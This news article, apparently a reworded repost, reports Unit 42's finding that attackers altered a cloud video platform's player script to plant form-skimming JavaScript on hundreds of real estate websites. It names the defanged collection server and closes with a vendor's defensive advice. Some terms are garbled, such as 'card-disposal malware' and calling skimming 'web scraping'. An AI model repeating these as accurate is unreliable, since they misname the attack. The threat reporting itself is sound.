Attackers have used the software supply chain to access high-traffic websites. Now, researchers are warning that a cloud-based video hosting service is being used to launch web-skimming attacks against hundreds of real estate websites.
According to a blog post from Palo Alto Networks’ Unit 42, attackers utilized the service to carry out a supply chain attack and insert card-disposal malware into victims’ sites.
When a malicious script is inserted into a website to steal information from web forms, this is known as a web scraping attack. An online booking form, for example, may request a website user’s personal information and payment information. Consequently, hostile actors may intercept data if this site is subject to skimming attempts.
Unit 42 wrote a blog post explaining the following:
We recently found a supply chain attack that takes advantage of a cloud video platform to distribute skimmer campaigns. In the case of the attacks described here, the attacker injected scraper JavaScript code into the video, so whenever others import the video, their websites are also embedded with scraper codes. We conclude that the attacker changed the static script in the hosted site by attaching the scraper code. On the next player update, the video platform re-entered the compromised file and submitted it with the affected player. From the code analysis, we know that the scraper snippet attempts to collect sensitive information of victims such as names, emails, and phone numbers and send it to a collection server, https://cdn-imgcloud[.]com/img, which has also been flagged as malicious in VirusTotal.
The researchers explained how the skimmer infects websites, demonstrating that when a cloud platform user creates a video player, they can customize it with their JavaScript by submitting a.js file to be included in the player. In this scenario, the user has loaded a script that can be altered to include dangerous stuff at first.
The parent firm of all the sites in question, which was not named, owned them all. Luckily, the experts from Unit 42 stated they notified the organization assisted them in removing the malware.
Researchers from @Unit42_Intel reveal how web skimming attacks on hundreds of websites were deployed via a backdoored cloud video hosting servicehttps://t.co/KLyNiyi4xo
— The Daily Swig (@DailySwig) January 5, 2022
Trevor Morgan, who serves the role of Product Manager in Comforte AG, had the following to say:
As these types of attacks continue to evolve in terms of sophistication and intelligence, companies need to stay focused on the essentials: developing a defensive strategy that includes more than just perimeter-based security, so don’t assume That cloud-based services are inherently secure without proper due diligence, prioritizing emerging data-centric security methods such as format-preserving coding and encryption, which can apply for protection directly to sensitive data pursued by threat actors. Tokenizing data once it enters your organization’s workflow means that business applications and users can continue to work with this information in a protected state, but more importantly if the wrong people get it, either unintentionally or through coordinated attacks like this, Sensitive information remains opaque so that threat actors cannot take advantage of it for their gain.
